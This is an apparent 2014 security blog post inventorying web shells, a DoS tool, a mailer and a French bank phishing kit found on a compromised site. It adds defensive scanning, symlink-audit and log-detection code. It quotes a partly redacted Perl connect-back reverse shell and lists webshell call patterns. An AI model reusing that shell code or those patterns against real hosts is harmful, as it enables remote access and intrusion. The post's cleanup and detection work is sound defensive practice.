Monday, January 13, 2014

construtorassm.com.br - shells and DoS and phishing, oh my

construtorassm.com.br
177.87.155.43

Started with a WSO shell. Cracked into it.

Found all sorts of hideous junk on here, including a Crédit Agricole (French bank) phishing kit:
WSO shell
ICH Th3 Unkn0wn MySQL interface
Priv8 shell
Symlink Sa 2 panel
Dangerous Mailer
VNShell DDoS shell
K2LL33d shell
turkblackhats.com shell
1923Turk.com mod b374k shell
RootDaBitch tool - brute-forces local accounts using su
CA.zip - Credit Agricole kit
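A quick way to turn an inventory like this into a check for the next box: the scanner below walks a web root and flags files that carry the shell names listed above, or the eval/exec-plus-decode pattern these tools lean on. This is an added example written for this post, not code from the server or from any of the shell authors; the three sample files it builds are constructed stand-ins with placeholder strings, not working shells, and the indicator lists are an assumption you'd extend from your own findings.

```python
import os
import re
import tempfile

# Indicator strings. The names come from the shells listed in the inventory
# above; the function names are the usual PHP primitives such tools use to run
# commands or unpack an obfuscated payload. Both lists are assumptions to extend.
NAME_MARKERS = ("wso", "b374k", "priv8", "k2ll33d")
DANGEROUS_CALLS = re.compile(
    r"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open)\s*\(",
    re.IGNORECASE,
)
OBFUSCATION = re.compile(
    r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.IGNORECASE
)
EXTENSIONS = (".php", ".php5", ".phtml", ".inc", ".pl", ".cgi")


def score_file(path):
    """Return a list of human-readable reasons this file looks like a webshell.

    An empty list means nothing matched. The file is read as bytes and decoded
    leniently so odd encodings inside a shell don't abort the whole scan.
    """
    reasons = []
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    lowered = text.lower()
    for marker in NAME_MARKERS:
        if marker in lowered:
            reasons.append(f"known shell name: {marker}")
    calls = sorted({m.group(1).lower() for m in DANGEROUS_CALLS.finditer(text)})
    if calls:
        reasons.append("command/eval primitives: " + ", ".join(calls))
    if calls and OBFUSCATION.search(text):
        reasons.append("eval/exec combined with a decode routine (packed payload)")
    return reasons


def scan_tree(root):
    """Walk a web root and return {relative_path: reasons} for suspicious files.

    Paths use forward slashes regardless of platform so results are stable.
    """
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            reasons = score_file(full)
            if reasons:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = reasons
    return hits


def build_sample_webroot():
    """Create a constructed web root: one innocent file and two fake 'shells'.

    The fakes are stand-ins written for this example. They contain only the
    marker strings and call shapes the scanner keys on, with constant
    placeholder arguments, so they do nothing if ever executed.
    """
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "index.php": "<?php echo 'hello'; mysqli_query($db, 'SELECT 1'); ?>",
        "images/.cache.php": "<?php /* WSO */ eval(base64_decode('PLACEHOLDER')); ?>",
        "wp-content/up.php": "<?php // priv8\nsystem('id'); ?>",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, why in sorted(scan_tree(build_sample_webroot()).items()):
        print(rel, "->", "; ".join(why))
```

Run it against a real docroot with `scan_tree("/var/www")`; anything in an uploads or images directory that ends in .php is worth a look even when it scores nothing, since dropper names like `.cache.php` are chosen to hide in exactly those places.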


Ok, let's have a look.

WSO 
(this was something like the 3rd WSO I found in here...seriously??)



MySQL Interface mod



Priv8 Shell
It literally tells me the password to the shell is 'priv8'

...and the password works. What an ugly piece of garbage too!



Symlink Panel
Symlinks the other shared-hosting accounts' directories into one place so they can all be mass-defaced.

Domains list, but the symlinks aren't working. Sorry buddy.
This thing stopped being useful a while ago.
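What a panel like that counts on is the web server happily following a link from one customer's docroot into another's. Here's the audit from the other side: it walks a docroot and reports every symlink that resolves outside it. This is an added example for this post, not code from the page or from any of these tools; it assumes a POSIX host where `os.symlink` needs no special rights, and the two-customer layout it builds is constructed.

```python
import os
import tempfile


def links_escaping_docroot(docroot):
    """Return sorted [(relative_link_path, resolved_target)] for every symlink
    under docroot whose target resolves to somewhere outside docroot.

    Directories are walked with followlinks=False, so a symlinked directory is
    reported once as a link instead of having the foreign tree walked.
    """
    root_real = os.path.realpath(docroot)
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot, followlinks=False):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                continue
            # realpath follows the whole chain; a dangling link still yields
            # its intended target path, which is what we want to report
            target = os.path.realpath(full)
            if os.path.commonpath([root_real, target]) != root_real:
                findings.append((os.path.relpath(full, docroot), target))
    return sorted(findings)


def build_fixture():
    """Constructed layout: two customers on one box, site_a linking into site_b."""
    base = tempfile.mkdtemp(prefix="hosting-")
    docroot = os.path.join(base, "site_a", "public_html")
    other = os.path.join(base, "site_b", "public_html")
    os.makedirs(os.path.join(docroot, "img"))
    os.makedirs(other)
    with open(os.path.join(other, "config.php"), "w") as fh:
        fh.write("<?php /* constructed stand-in for a neighbour's config */ ?>")
    with open(os.path.join(docroot, "logo.png"), "w") as fh:
        fh.write("png")
    # benign: a link that stays inside the same docroot
    os.symlink(os.path.join(docroot, "logo.png"), os.path.join(docroot, "img", "logo.png"))
    # the symlink-panel pattern: a link to another customer's file
    os.symlink(os.path.join(other, "config.php"), os.path.join(docroot, "neighbour.txt"))
    # and a link to a system file
    os.symlink("/etc/passwd", os.path.join(docroot, "pw.txt"))
    return docroot, other


if __name__ == "__main__":
    docroot, _other = build_fixture()
    for rel, target in links_escaping_docroot(docroot):
        print(f"{rel} -> {target}")
```

On Apache the configuration answer to this class of panel is `Options -FollowSymLinks +SymLinksIfOwnerMatch` plus running each customer's PHP as its own user (suPHP or a per-site php-fpm pool), so a link to another account's file fails instead of being served. The audit above is still worth running periodically, because a panel that has already dropped links is a sign the box was compromised, whether or not the links currently work.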


Dangerous Mailer
Login to mailer panel.

Long view of Dangerous Mailer


VNShell Flooder
(because DoS is hacking)
This is the type of stuff they teach you at HackForums.
Oh yeah, and this isn't even a shell, even though it's called a shell.

Select the attack type

Target, http file, attack time



K2LL33d
Does it look like the b374k shell (below)?
Yes, that's because this skilled hacker just changed a few lines of code and called it his own work.
v3ry sw33t


If your eyes aren't already bleeding, get a load of this.


TurkBlackhats Shell


b374k shell (1923Turk)
Yawn.


RootDaBitch
This tool brute-forces su to gain elevated privileges; it uses suCrack.
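Brute-forcing su leaves a very loud trail in auth.log, so here is the detection side of it: a small parser that groups failed su attempts per (user, target) pair, alerts when a burst crosses a threshold inside a sliding window, and notes whether a successful su followed the burst. This is an added example for this post, not part of the kit or the page; the log lines are constructed and follow the shadow-utils su wording, and the threshold, window and year are assumptions to tune (syslog timestamps carry no year).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log in syslog format. The su lines use the
# shadow-utils wording "FAILED SU (to <target>) <user> on <tty>" and
# "Successful su for <target> by <user>"; other su builds word it differently.
SAMPLE_LOG = """\
Jan 13 02:11:01 web1 su[4401]: FAILED SU (to root) www-data on pts/2
Jan 13 02:11:01 web1 su[4402]: FAILED SU (to root) www-data on pts/2
Jan 13 02:11:02 web1 su[4403]: FAILED SU (to root) www-data on pts/2
Jan 13 02:11:02 web1 su[4404]: FAILED SU (to root) www-data on pts/2
Jan 13 02:11:03 web1 su[4405]: FAILED SU (to root) www-data on pts/2
Jan 13 02:11:03 web1 sshd[4410]: Accepted publickey for deploy from 203.0.113.9 port 51122 ssh2
Jan 13 02:11:04 web1 su[4406]: FAILED SU (to root) www-data on pts/2
Jan 13 02:11:09 web1 su[4407]: Successful su for root by www-data
Jan 13 09:30:12 web1 su[5120]: FAILED SU (to root) alice on pts/0
Jan 13 09:30:20 web1 su[5121]: Successful su for root by alice
"""

FAILED = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ su(?:\[\d+\])?: FAILED SU \(to (\S+)\) (\S+) on \S+"
)
SUCCESS = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ su(?:\[\d+\])?: Successful su for (\S+) by (\S+)"
)


def _ts(text, year):
    # syslog timestamps have no year, so the caller supplies one
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def detect_su_bruteforce(log_text, threshold=5, window_seconds=60, year=2014):
    """Return one alert per (user, target) pair that racked up at least
    `threshold` failed su attempts within `window_seconds`.

    Each alert is a dict with user, target, failures, first, last and
    success_after (True if a successful su for that pair came at or after the
    last failure in the burst, i.e. the brute force probably worked).
    """
    fails = defaultdict(list)
    successes = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            fails[(m.group(3), m.group(2))].append(_ts(m.group(1), year))
            continue
        m = SUCCESS.match(line)
        if m:
            successes[(m.group(3), m.group(2))].append(_ts(m.group(1), year))

    alerts = []
    for (user, target), times in fails.items():
        times.sort()
        for i in range(len(times)):
            # count failures from times[i] forward that fall inside the window
            j = i
            while j < len(times) and (times[j] - times[i]).total_seconds() <= window_seconds:
                j += 1
            if j - i >= threshold:
                last = times[j - 1]
                success_after = any(t >= last for t in successes.get((user, target), []))
                alerts.append({
                    "user": user, "target": target, "failures": j - i,
                    "first": times[i], "last": last, "success_after": success_after,
                })
                break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for a in detect_su_bruteforce(SAMPLE_LOG):
        print(a)
```

On the sample, www-data hammering root six times in three seconds and then succeeding is the alert; alice's single typo followed by a successful su is not. A web server account like www-data attempting su at all is itself worth alerting on, since nothing legitimate does that from a PHP process.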

Directory listing of the kit, showing a Bash script, a password txt and screenshots?
Why?



Oh yes, because I don't know how to run a bash script, nor would there be useful info in the script source code either...sigh.

Not one, but two screenshots!
This one proves that he got in !! Wow cool. Fuck you.
Thanks "The Breacher", that was really helpful to me and my fellow skids.


(Shake my head)

More things that are not that interesting and pretty useless but someone decided to spend time working on anyway:


PHP mailer, no panel, POST method
<?php
/* Form variables */
$nome = trim(@$_POST['nome']);/* receives the data typed into the "nome" field */
$email = trim(@$_POST['email']);/* receives the data typed into the "email" field */
$assunto_user = trim(@$_POST['assunto']);/* receives the data typed into the "assunto" field */
$mensagem = trim(@$_POST['mensagem']);/* receives the data typed into the "mensagem" field */
[...redacted]

Perl back-connect (reverse shell)
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
[...redacted]
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  [...redacted]
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";



Last but not least.

Crédit Agricole phishing kit - CA.zip
Includes the js, php, images, etc. for the phishing site.
Bad guys redirect victim traffic to a kit like this in an effort to steal login credentials.
Crédit Agricole S.A. is the largest retail banking group in France, second largest in Europe and the eighth largest in the world by Tier 1 capital according to The Banker magazine. - Wikipedia
Phishing pages:
I deleted all of this junk. All the shells, phishing pages, mailers, the DoS 'shell'... all of it. I emailed the admins too: operacional[at]rapidoacesso.com.br

